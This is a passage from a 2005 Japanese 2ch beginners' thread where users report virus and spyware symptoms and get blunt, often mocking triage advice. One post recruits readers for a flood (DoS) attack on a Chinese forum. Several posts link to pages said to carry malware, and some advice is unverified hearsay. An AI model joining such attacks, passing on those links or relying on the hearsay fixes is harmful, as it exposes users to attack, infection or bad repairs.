【ちゃんとUpdateしてるか】しています
【スキャンした結果（ウイルス名・発見場所）】問題なし
477 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 10:12:50 ]: >>476
普通に考えて、そうゆう事で日本の大銀行が個人にメールを送ってくると思う？
削除・放置しときましょ。
478 名前：476 [2005/04/15(金) 10:41:03 ]: ヘッダーを表示させてみたらあってるみたいだし、送り元がちゃんとわかるようなパターンの
ウイルスがあってサーバーが返信してきてるのかなとかぐるぐる考えてたんですが、
放っておいて構わないと聞いて安心しました。

ウイルスが届くのは慣れたけどメールが感染してたよといわれるのはどうも怖くって。
ほっとしました。　ありがとうございました。
479 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 11:07:42 ]: 【使用OS】 windows2000
【WindowsUpdateしてるか】していない
【AntiVirusは何を使っているか】 AVG free
【ちゃんとUpdateしてるか】している
【症状を具体的に、分かる限りすべて書く】
　画面に血しぶきのようなものが出て、血文字で大きく「ぬるぽ」
　と表示されました。その後LANケーブルを抜いたら
　血しぶきは治まりました。普通にPCが使える状態になりました。
　で、その時はシャットダウンして今朝電源を入れたら、
　「windows 2000 roots\system32\ntoskrnl.exe
上記のファイルをインストールし直してください。
という表示が出てしまいます。
【何をしたらそんなことになったのか】
　何も覚えがありませんが、血しぶきが出る直前に
　windows2000のCDを入れるように指示が出ました。
　その後血しぶきが出ました。
480 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 11:17:36 ]: >>479
はい　あなたには対処不可能
481 名前：479 [2005/04/15(金) 11:20:42 ]: なんで対処不可能なのでしょうか?
ウィルスでハードディスクが消えてしまったのでしょうか?
482 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 11:36:07 ]: >>479
マルチ乙
483 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 11:37:18 ]: >>479
pc8.2ch.net/test/read.cgi/pcqa/1113492028/112-
484 名前：479 [2005/04/15(金) 11:40:28 ]: 板違いでもマルチになるんでしょうか?
とにかくこのウィルスについて詳しいことを教えてください。
485 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 11:41:06 ]: >>484
巣に帰れ
486 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 11:42:54 ]: 479
同時進行中
pc8.2ch.net/test/read.cgi/pcqa/1113492028/151
487 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 12:43:11 ]: こういうｱﾌｫもいまつ。

ほぼ全世帯数の情報流出　旧湯沢市の１万人分
www.sankei.co.jp/news/050415/sha036.htm

秋田県湯沢市（人口約５万７０００人）の市民１万１２５５人分の住所、氏
名、性別、生年月日が記載されていた名簿が、インターネット上に流出して
いたことが１５日、分かった。

同市は３月に４市町村が合併したが、流出したのは合併前の旧湯沢市が２０
０３年１月から実施した市町村合併の市民意向調査用の名簿で、各世帯から
１８歳以上の市民１人を抽出、ほぼ全世帯数に当たるという。

名簿を管理していた男性職員の公用パソコンがウイルスに感染したことが原
因とみられ、同市は個人情報の管理が不十分だったとして、１１日付で職員
を訓告処分にした。職員は、ファイル共有ソフト「Ｗｉｎｎｙ（ウィニー）」
をインストールしていたという。
488 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 12:49:13 ]: >>478
推測すると、

ウイルスが送信元を詐称して、警告メールの送信元のメアドに自己増殖メールを送りつける。。
　　　　　　　　　　↓
送付先の鯖のウイルス対策ソフトが、未だに送信元に警告メールを送り返すなんて
DQNな設定を変えずに運用している。
　　　　　　　　　　↓
ネットワークに負荷をかけるは、単にメアド詐称されただけの運が悪い人に
警告メールを送りつけて不安にさせるはの百害あって一利無しな
SPAMメールが大量に発生。

って可能性が非常に大きい。
489 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 13:14:54 ]: 【WindowsUpdateしてるか】していない
【AntiVirusは何を使っているか】 AVGFree
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】キンタマウィルス
【症状を具体的に、分かる限りすべて書く】
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて　[キンタマ] 俺のデスクトップ PCのユーザー名[日付]（ファイル詰め合わせ）.lzh　という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
　（例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい）
【何をしたらそんなことになったのか】
キンタマワームを踏みました。
【これまでにとった措置】
　　"C:\Documents and Settings\ユーザー名\Local Settings\Temp"の"ユーザー名.txt"を削除。
490 名前：476,478 mailto:sage [2005/04/15(金) 13:31:38 ]: >488
よく知ってるような大きい所だったので、ついつい「もしや本当に自分が？」と
思ってしまって。　知識不足が不安の元なので、今から色々勉強していきます。

一昨日からスキャンしたりぐぐったりしながら唸ってたのがすっきりしました。
お二方、どうもありがとうございましたm(__)m
491 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 14:06:12 ]: >>490
ウィルス感染していなかったら、
「送信元メールアドレスを詐称したウィルスメールに自動返信すなぁ　ｺﾞﾙｱ」と
メールを送り付けてあげて下さい。
俺のプロバイダーはここだぞ　「アホ」　と送ってやって下さい。
492 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 14:19:09 ]: >>489
ny関連お断り。巣へお帰りください。
493 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 14:20:10 ]: 【WindowsUpdateしてるか】していない

ヽ(´ー｀)ノ
494 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 14:47:56 ]: つい踏んでしまったんですが、大丈夫なんでしょうか？

ttp://www.yaromat.com/macos8/index.htm

安心させてください。よろしくお願いします。
495 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 14:49:17 ]: ああもうダメだね
496 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 14:51:25 ]: ﾀﾞﾒﾀﾞこりゃ。いやﾏｼﾞで。
497 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 14:51:39 ]: 最近ウイルスサイトのURL貼ってるゴミ屑は同一人物だよ。
少し調べてみた。
498 名前：494 [2005/04/15(金) 16:23:23 ]: で、正体は何ですか？
499 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 16:30:50 ]: ノートンウイルススキャンでウイルスは検出されません。他のオンラインでもウイルスは検出されません。

ノートンが、www.sophos.co.jp/virusinfo/analyses/w32paritea.html
このウイルスの活動の警告、ブロックをたまに出すのですが。

外部からなのかどうか知る方法は、どうすればいいですか？
ノートンで、コンピューターをスキャンしてウイルスが検出されてないので、
外部からとの断定でいいのでしょうか？
500 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 16:34:27 ]: >>494
＞大丈夫なんでしょうか？
あぁ　駄目だね。
ウィルス感染してるよ。
501 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 16:35:15 ]: >>499

>>1
502 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 16:48:53 ]: めんどうやのぉー
【使用OS】 XP　home　sp2以外総て当ててある。
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】ノートンアンチウイルス2005
【ちゃんとUpdateしてるか】済み
【スキャンした結果（ウイルス名・発見場所）】W32/Parite-A
【別のオンラインスキャンしたならその結果は】
トレンドマイクロ　なし
ビットディヘンダー　なし
マカフィー　　なし
panda　なし
【症状を具体的に、分かる限りすべて書く】ノートンの警告がでる。W32/Parite-A
【何をしたらそんなことになったのか】
【これまでにとった措置】 W32/Parite-A感染していたので、ノートンによる駆除。
【その他の質問】
503 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 16:55:28 ]: テスト
504 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 17:08:12 ]: 決められた事が面倒だったらここにこなくていい。
自分で解決しろ　ハゲ
505 名前：muro YahooBB220029188143.bbtec.net/ mailto:zage [2005/04/15(金) 17:08:34 ]: え　　　　　っ　　　　　る　　　　　ﾊ　　　　　
　　ぇ　　　　　し　　　　　の　　　　ァ　ﾊ　　
　　　　け　　　　　と　　　　　ぉ　　　　　ァ　
うはっwww夢がひろがりんぐwwwwww　　　
506 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 18:01:18 ]: >>505
運営に報告済み。
507 名前：489 [2005/04/15(金) 18:44:20 ]: >>489ですが、以下の症状を追加しときます。

血文字で大きくぬるぽとだんだんと表示されて、ほとんどの.zip、.rar、.mp3ファイルが
317KBの「ぬるぽ」と表示されるファイルに変わってしまいました。
これはどんなウィルスに感染したのでしょうか？また、対処方法を教えてください。
おねがいします。

どなたかウィルス名を教えてください。
508 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 19:04:00 ]: 再インストール
509 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 19:08:45 ]: 455で書き込みをした者です。
あの後スキャンしたらやはりsystem32内の中で
ランダム名がつけられている.exeが感染していました

色々試しているうちに、普通に起動して
タスクマネージャで終了した後も新しく出現しませんでした。
感染したファイルを検疫→削除することが出来ました
その後スキャンしたら感染が見当たりませんでした。

警告ウィンドウも出なくなりました。
510 名前：489 [2005/04/15(金) 20:03:14 ]: >>508
本当に再インストールしかないのでしょうか？
また、山田ウィルスについて詳しい方がいたら教えてください。
511 名前：273 mailto:sage [2005/04/15(金) 20:08:46 ]: >>273で質問したものです。他スレ行ってマルチになるとダメなので再度こちらで質問します。

>>275
遅レスすみません。
あれから１週間経ちましたが、未だに解決できずにいます。（グーグル使ってＯＥの事、調べまくった）
今日はレジストリ少しいじりながらＯＥを再インストールし直したけど、また同じ症状です。
又、プロセスチェッカーでプロセス見たり、ｎｅｔｓｔａｔコマンドでポート監視しましたが、
ウイルスやトロイやワームらしき動きは発見できませんでした。
これって全ドライブＦＯＲＭＡＴして、ＦＤＩＳＫし直して、リカバリＣＤでインストールしても、
消えないウイルス（ＢＩＯＳ感染とか）なんでしょうか？

そんなわけで気持ち悪いので、この機会にと、昨日、新しいパソコンを注文しました。
ttp://pc8.2ch.net/test/read.cgi/pc/1111710470/874
それで今度買うＰＣは今の家庭内ＬＡＮ（ＡＤＳＬルータ）には接続しない方がいいでしょうか？
（しない方がよければ、ケーブルネット契約してそこにその１台のみ接続するつもりです）

ただウイルスにやれてたとしても、今のこのパソコンには愛着があるので、簡単に捨てたくないんです。
（５年前買ったＰＣ：ＩＢＭ　Aptiva CPU533MHz,MEM192MHz,HDD15GB）
なんとかして使う方法ありますか？（ネットから隔離して、ＣＤ－Ｒ焼き専用機にするとか…）

わかる方、どんな事でもいいのでアドバイスお願いします。（スレ違いなら該当スレに誘導願います）

参考：
クリーンインストール直後のｄｂｘファイル（４／６）
ttp://www.asahi-net.or.jp/~kf8t-fjt/dbx.jpg

私のＰＣ(４／１２現在)
ttp://www.asahi-net.or.jp/~kf8t-fjt/mydesktop.jpg

稚拙ですが晒します…
512 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 20:26:35 ]: 質問失礼致します、どなたか助言下さい。

【使用OS】ＸＰのホームエディション
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】ソ－スネクストのウイルスセキュリティ
【ちゃんとUpdateしてるか】しています
【スキャンした結果（ウイルス名・発見場所）】なし
【別のオンラインスキャンしたならその結果は】していません

【症状を具体的に、分かる限りすべて書く】
最近やたらとヤフーメールの方にウイルスメールが来るようになりました、
ｈｅｌｌｏ等のタイトルに怪しげな添付ファイル付なので開かず即削除をしていたのですが、
先程、出した覚えの無いメールの差し戻しメールを受信致しました。
これは私のＰＣが感染してしまって勝手に何処かへメールを送信し、
そのうちの1通が戻って来たものだと思い、ＰＣをスキャンしたのですが、
ウイルスは検出されませんでした、使用したソフトはＡＶＧです。

【何をしたらそんなことになったのか】主にオークションに使用
【これまでにとった措置】特に無し（ＰＣスキャンのみ）

宜しくお願い致します。
513 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 20:27:37 ]: >>511
だから素直に再クリーンインストール汁
514 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 20:31:34 ]: 他の端末なりネットなりから完全に切り離した状態で
OSクリーンインストールしたら、そういう症状は出ないハズ。・・・・とは思うが

それで健康なら、外部に繋ぐメインのXP機からのみ→98機に繋がるという構成にすれば活かせる、かも知れない
XPから98に感染なんて、まずしないだろうし

＞それで今度買うＰＣは今の家庭内ＬＡＮ（ＡＤＳＬルータ）には接続しない方がいいでしょうか？

おそらく大丈夫
515 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 20:32:12 ]: >>512
おまいさんのメルアドに偽装した他人のPCが送ったウィルスじゃねえの？
無視汁
516 名前：512 mailto:sage [2005/04/15(金) 20:44:01 ]: >>515
即レスありがとうございます。
オク取引のメールは即削除を心掛けているのですが、
現在お取引中の方がいらっしゃるので安心しました。
偽装と言う文字が出て来なかった・・・慌てるとダメですねorz

さっき来ていた偽装らしき方のIDが主にベビー＆子供関連の出品で、
私もここ２ヶ月位の間ベビー＆子供関連の落札を久しぶりにしたので、
もしかしたら共通の出品者が感染しているのかもしれません・・・（以前は趣味関連のみだったので）
本当にありがとう御座いました。
517 名前：489 mailto:sage [2005/04/15(金) 20:53:11 ]: もうダメぽ･･･しぶきがあがってぬるぽAAに侵食された。。。
何か他にヤバイ症状はあるんでしょうか？
518 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 20:54:44 ]: IE起動しててもctrl+alt+delで起動中のプログラムにIEが表示されなくなったっす
だからフリーズしても強制終了できない・・・
これウィルスでしょうか？
519 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 21:05:15 ]: >>517
いい加減うざい
520 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 23:05:58 ]: >>512
漏れも削除ｽﾙｰでいいと思うよ。

>>518
>>1
521 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 23:15:29 ]: >>511 あのな、お前ら！
ただ単にブートセクターに付いてるウイルス系に感染してるだけだろ。
フォーマットしてもそりゃーだめだわさ。
ハードディスク内を一度、全て０書きしてデータ消去しなはれ。
その後インストールすれば、治る。
522 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 23:20:09 ]: アウトルックの受信トレイなど＜＊．ｄｂｘ＞のファイルにゴミ（パソコン内のデータ）が入る。
消してもアウトルック立ち上げると再び同じようなファイルができる。
（新しい空のファイルのはずなのに７５ＫＢ）
また、アドレス帳を更新したら、デスクトップに意味不明のゴミファイルができる。
（主にアドレス帳の中身）

というか、新しいはずなのに、７５KBって、それくらいで普通ジャネぇーの？
受信のdbxファイルの容量が７５KBで、受信フォルダーには、何もメール無いんだろ？

後デスクトップにごみって、まさか、~のファイルのことじゃないよね？
523 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 23:25:37 ]: 山田ウイルスってなに？
524 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 23:29:21 ]: ノートンを入れてるんだけど、ノートンでウイルススキャンすると
感染ゼロなのに、気になって数カ所でオンラインスキャンすると
ウイルス検出される……、これはどういう事なんですか？
525 名前：名無しさん＠お腹いっぱい。 [2005/04/15(金) 23:36:39 ]: ノートンの検出が１００パーセントじゃないから。
他で検出される。または、誤検出？
526 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/15(金) 23:42:17 ]: >>523
★山田ウィルス対策スレ【】
qb5.2ch.net/test/read.cgi/operate/1113229514/l50

そのまま書き込もうとしたら、さくらに飛ばされたよｗｗｗ
527 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 00:34:21 ]: 【使用OS】 xp
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】ウィルスバスター２００４
【ちゃんとUpdateしてるか】してる
【スキャンした結果（ウイルス名・発見場所）】反応なし
【別のオンラインスキャンしたならその結果は】
ウィルスバスター、シマンテックとも反応なし
【症状を具体的に、分かる限りすべて書く】
IEのツールバーに変なのがダウンロードされてる　wo99.comへのリンクみたい
画像の上にマウスを置くとカタカナで変な説明が出る　とっかへのリンクっぽい

【何をしたらそんなことになったのか】反日サイト行ったからだと思う
【これまでにとった措置】
ad-aware　セーフモードでもやった
spybot
アドウェアとかたくさん出てきたけどこれだけ消えない・・・
window\download program filesからそれらしきものを削除
【その他の質問】よろしくおねがいします
528 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 00:38:51 ]: >>527
Ewidoでスキャンしたら消えると思うよ
529 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 00:39:30 ]: 指揮系統に乱れが出てます！
現在中国側と交戦中です、指揮できる方おられましたら援軍願います！

【田代砲専用】日本 2ch VS 中国 2ch 【作戦会議所】Part 5
ex10.2ch.net/test/read.cgi/news4vip/1113578743/
530 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 01:18:16 ]: GatorPatch.logというのが検出されたんですが、どうやったら駆除できますか？
スパイウェア除去ソフトでは駆除しきれませんでした。
531 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 02:25:38 ]: 【使用OS】WIN98（初代）
【WindowsUpdateしてるか】していません。
【AntiVirusは何を使っているか】ソースネクストウイルスS
【ちゃんとUpdateしてるか】しています

【その他の質問】
山田ウイルスの検索方がいまいち解らなかったので質問させて頂きます。
127.0.0.1/をクリック
ウィルスに感染するとHTTPサーバが立ち上がっているため127.0.0.1/にハードディスクの
フィルリスト一覧が表示される。
↑これで問題なかったのですが

その他、
ドライブ内をmellpon、svchostで検索。
↑これのmellpon含むファイル検索した所にてC\WINDOWSのUser.datと
　C\WINDOWS\Temporary Interbet filesにていくつかHtmlファイルがヒットしました。
　後者はセキュリティ関係記事の一時ファイルだろうとして前者User.datファイルは
　大丈夫でしょうか？
　そもそも127.0.0.1/で問題なければその時点で山田ウイルスに現時点で
　感染している心配はないのでしょうか。
532 名前：527 mailto:sage [2005/04/16(土) 02:44:16 ]: >>528
だめでした・・・

オンマウスでの説明、かなりウザイです。
533 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 02:49:26 ]: >>532
行った反日サイト教えてよ。
534 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 02:52:28 ]: ↓このスレ行くといきなりトロイが感染したとか出るんですが大丈夫でしょうか?

ｾｷｭﾘﾃｨ初心者質問ｽﾚｯﾄﾞpart54
tp://pc8.2ch.net/test/read.cgi/sec/1112001984/l100

特に不安なのはよく実況板などで張られているいたずらウイルスとはノートンのメッセージがちがうことです。
削除できませんでした、みたいなメッセージが出ます。
535 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 03:36:52 ]: トレンドマイクロでオンラインスキャンを実行したらウイルスが発見されました。
このウイルスはどんな対応を取ればよいのか、どのような活動をしているのかが知りたいです。
情報は以下のとおりですのでよろしくお願いします。

【使用OS】 WinXP
【WindowsUpdateしてるか】最近数ヶ月しておりません。
【AntiVirusは何を使っているか】何も使用しておりません。オンラインスキャンをたまにします。
【スキャンした結果（ウイルス名・発見場所）】ウイルス名BKDRJZRAM.17　発見場所C:\WIN\IFinst25.exe
【症状を具体的に、分かる限りすべて書く】最近パソコンがたまにですが勝手に再起動されたり、すごく重くなります。
　おかしいかなと思い、スキャンしましたがこのウイルスはあまり関係がないかもしれませんが・・
【何をしたらそんなことになったのか】よくわからないものはクリックしないので原因は不明です。
【これまでにとった措置】発見したファイルIFinst25.exeを削除しました。ウイルス名なども検索しましたが
　該当するものがないとのことで、どういったウイルスなのか知りたいです。
536 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 03:44:20 ]: >>535
確か山田の亜種ってそんな名前だったはず
537 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 04:13:59 ]: >>536
そうだったんですか・・・じゃあ今も書き込みされてるんですかね・・
プロパティを見たら2002年に作成されたとなっていたので、少し安心してたのですが
こういう日時って勝手に嘘情報にできるんでしょうか？

そのIFinst25.exeファイルだけを削除じゃウイルスの活動事態は止まらないのでしょうか？
538 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 04:19:23 ]: 山田だったら、その内、シマンテックが無料駆除ツール出すんじゃないか？
539 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 05:15:29 ]: >>537
ちょっと気になったんだけど
AntiVirusを導入する気はないの？
540 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 06:10:33 ]: 時限式hdd消去ってのが発動したんすけど、対処法なんかありますか？
541 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 06:14:35 ]: >>539
今金欠なので・・そのうち購入しようと思っています。
とりあえずWindowsUpdateは行いました。しばらく行かないうちに重要な更新が16個も。
542 名前：z66.220-213-34.ppp.wakwak.ne.jp/~ss.jpg mailto:age [2005/04/16(土) 06:23:52 ]: え　ぇ　け　っ　し　と　る　の　ぉ(*´Д`)ﾊｧﾊｧ

うはっｗｗｗおｋｗｗｗうえっうえっｗｗｗ？？
543 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 07:35:47 ]: ↑感染してます
544 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 10:58:58 ]: >>537
IFinst25.exeってオンラインゲームと関連あるような、ないような
いろいろ情報あってよーわからん。
545 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 12:09:03 ]: >>535
BKDRJZRAM.17?
BKDR_IZRAM.17なら
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_IZRAM.17
546 名前：527 mailto:sage [2005/04/16(土) 13:51:38 ]: >>533
このサイトに行ったからだと思う
ttp://www.japanpig.com/
547 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 14:41:26 ]: nyでShareの本体落としたら、クローンCD形式のccdファイルで、
試しにデーモンで読んでみたらオートランで小さくウィンドウが開いて
「ウィルスだったらどうするんだよバーカ」
というような意味のメッセージが表示されました。

これはウィルスでしょうか。ウィルスバスター2005では特に検出されなかったのですが。
548 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 14:42:20 ]: >>547
ﾀﾞｳｿ板に(・∀・)ｶｴﾚ!!
549 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 14:44:39 ]: >>547
巣に帰れボケ
550 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 15:22:08 ]: >>548-549
誘導ありがとうございました。
551 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 17:14:45 ]: 今じゃこの程度の厨でもnyに手出してるんだもんな・・・
そりゃ感染するﾊﾞｶが増えるはずだよ・・・
552 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 18:01:41 ]: >>551
スレ違いな投稿でスマンが、厨で無くともやってるぞ
ただこのny等の場合最低自分のケツは拭けるぐらいの
スキルが無いと色んな意味で最悪だな

非常にヤバイ鼠の映画を子供の為に落とした友人の
嫁さんに泣きつかれた事があった。もちろんウィルスね。
553 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 18:15:28 ]: Loveletterとかいうのが検出されたんですけど、どうすれば良いんですか？
まだこれといった被害は出てませんが、めちゃくちゃ怖いんですけど。
554 名前：名無しさん＠お腹いっぱい。 [2005/04/16(土) 19:39:47 ]: >>553
>>534
555 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 20:56:15 ]: >>552ははたして厨の意味がわかってるのだろうか・・・？
556 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 22:24:00 ]: >>544
以前オンラインゲームやっていた時期がありました。
数年前なので、プロパティのファイル作成日時と合うかもしれません。
本当に2002年に作成されたファイルなら、今まで何度もスキャンしていたときには引っかからず、
何故今回は急にウイルスとしてひっかかってきたのかが疑問です

>>545
BKDRJZRAM.17のほうでした。同じウイルス名はみあたらないですよね・・
名前が近いものはウイルスの活動も似ているかもしれないので
そちらも参考にさせていただきます。
557 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/16(土) 23:26:17 ]: >>556
トレンドマイクロだよな。
トレンドマイクロは命名規則は公開してなかったと思うけど、
法則性から考えると

・ウイルスの種類を意味する接頭語（今回は「BKDR」＝バックドア型）
・ウイルスの識別名（名前）
・接尾語（主に亜種を表示）

になってて、接頭語と識別名間に“_”（アンダーバー／アンダースコア）、
識別名と接尾語の間に“.”（ピリオド）を挟んでるはずだから、
「BKDRJZRAM.17」って名前が存在するってのは考えにくいんだが・・・。
558 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 07:13:36 ]: >>557
だよな。>>556の言ってることは矛盾してる。
オンラインスキャンで登録されてないウィルスが見つかった例なんて今まで一度も無い。
ヒューリスティックで見つかった場合もちゃんと載ってたし。何か怪しい。
559 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 08:12:58 ]: 【使用OS】 windowsXP
【WindowsUpdateしてるか】してるよ
【AntiVirusは何を使っているか】 ANTIDOTE（簡易版）
【ちゃんとUpdateしてるか】してるよ
【スキャンした結果（ウイルス名・発見場所）】アンチウィルス入っていれば、しないでも宜しい。
【別のオンラインスキャンしたならその結果は】これもしないで宜しい。
【症状を具体的に、分かる限りすべて書く】アンチウィルスを入れるとPCが重くなると言われるが、
このANTIDOTEというアンチウィルスは本当に常駐保護してくれているのか、
それすら分からないほど本当に軽い。
【何をしたらそんなことになったのか】 ANTIDOTEは非常にイイ（・∀・）
【これまでにとった措置】 ANTIDOTEは最高！
【その他の質問】みんなも今入れてるアンチウィルスを止めて、ANTIDOTEにしましょう。
560 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 09:34:36 ]: βακα..._〆(ﾟ▽ﾟ*)
561 名前：名無しさん＠お腹いっぱい。 [2005/04/17(日) 11:10:08 ]: 隣の奴らセックスしてたから盗撮してやったｗｗｗｗｗ
ex10.2ch.net/test/read.cgi/news4vip/1113648948

zipファイルにウイルス入ってるみたいだな。
562 名前：名無しさん＠お腹いっぱい。 [2005/04/17(日) 12:13:27 ]: ttp://www.galstown.com/mnj/bbs/bbs.cgi?room=uhbvgy
この掲示板に貼ってあるメリッサscriptって、ノートンが反応するだけで実害は無いよね？
2chにラブレター貼ってるのと同じことだよね？
563 名前：273=511 mailto:sage [2005/04/17(日) 15:33:00 ]: >>513

はい、わかりました。

>>514

ありがとうござます。
この前確認した時は、ネットにつないだ後（アップデート後）でした。
今度はインストール直後の切り離した状態で確認してみます。

>>521

ありがとうございます。
あれからグーグルでいろいろ調べました。
「全て０書きしてデータ消去」というのは物理フォーマットの事ですよね？
起動ディスクから、「ｓｙｓ　ｃ：」や「ｆｄｉｓｋ　／ｍｂｒ」しても直らなかったので、
新しいＰＣ来たら、そのＰＣで物理フォーマットソフトＤＬして、フォーマットしてみます。

>>522

>>511に書きましたけど、
ttp://www.asahi-net.or.jp/~kf8t-fjt/dbx.jpg
↑これがその７５ＫＢの中身なんですが、「普通」なんでしょうか…

＞後デスクトップにごみって、まさか、~のファイルのことじゃないよね？

そのデスクトップにできるのは「~」のファイルです。
又、ＩＥの再インストール直後のアドレス帳保存フォルダの「＿ｗａｂや」「＿ｗａ」のファイルは、
まっさらの状態なのに、１７３ＫＢもあります。
564 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 17:24:48 ]: トレンドマイクロで無料診断してみたら
ＪＡＶＡ_ＢＹＴＥＶＥＲ.A
ＪＡＶＡ_ＢＹＴＥＶＥＲ.A-1
ＪＡＶＡ_ＢＹＴＥＶＥＲ.C
HTML_COOLWEB.A
特に上記三つが無数にありました。
削除しようとすると、現在使用中のためむりです。といわれます。
どうしたらいいでしょうか。
565 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 19:35:08 ]: 【使用OS】 XPSP2をnliteでとことん軽量化
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】ノートンインターネットセキュリティ体験版
【ちゃんとUpdateしてるか】 LiveUpdateはしました
【スキャンした結果（ウイルス名・発見場所）】ウイルスバスターオンラインスキャン、ノートンアンチウイルスともに何も引っかからず
【別のオンラインスキャンしたならその結果は】何もなし
【症状を具体的に、分かる限りすべて書く】
突然再起動が掛かります。プツッと。
感じとしては電源が入ってないPCに電源を入れた感じです。
行き成り画面暗転します。
【何をしたらそんなことになったのか】
某ウイルスが仕込まれているページを開いてから。ですが、
Javaなんとか、、というものでした。
詳細な名前は思い出せません。削除しました。
【これまでにとった措置】
オンライン、ノートンスでスキャン
【その他の質問】
そもそもウイルスなのか疑問です。
三年近くPCを弄っていますが、初めてのことで。
OSは再インストールしました。
ちなみに、デュアルブートでXPが二つ入ってます。
パーティションは三つに分けてます。
多分、ハードの面でおかしいと見当をつけており、HDかどこかの接触不良かな？それとも寿命ってやつ？
かと思うのですが、こんなに鮮やかに、それもまったく不定期（？）に再起動が掛かるので、
ただの接触不良にしては？と言った感じです。接触不良なら電源は落ちっぱなしになるでしょうから。

もしかしたらトロイ？かもしれませんが、（OS再インストールしてるのに。。
だとすると、違うパーティションに寄生でもしてるのでしょうか。。
何か、ご意見お願い致します。。
566 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/17(日) 19:57:52 ]: 3年も使ってて泣きっ面かよ。ばーかｗ
567 名前：名無しさん＠お腹いっぱい。 [2005/04/17(日) 20:12:15 ]: 宜しくお願いいたしますm( __ __ )m
【使用OS】windows xpホームエディションです。
【WindowsUpdateしてるか】自動更新してます。
【AntiVirusは何を使っているか】ノートン2003で、料金払って自動更新してます。
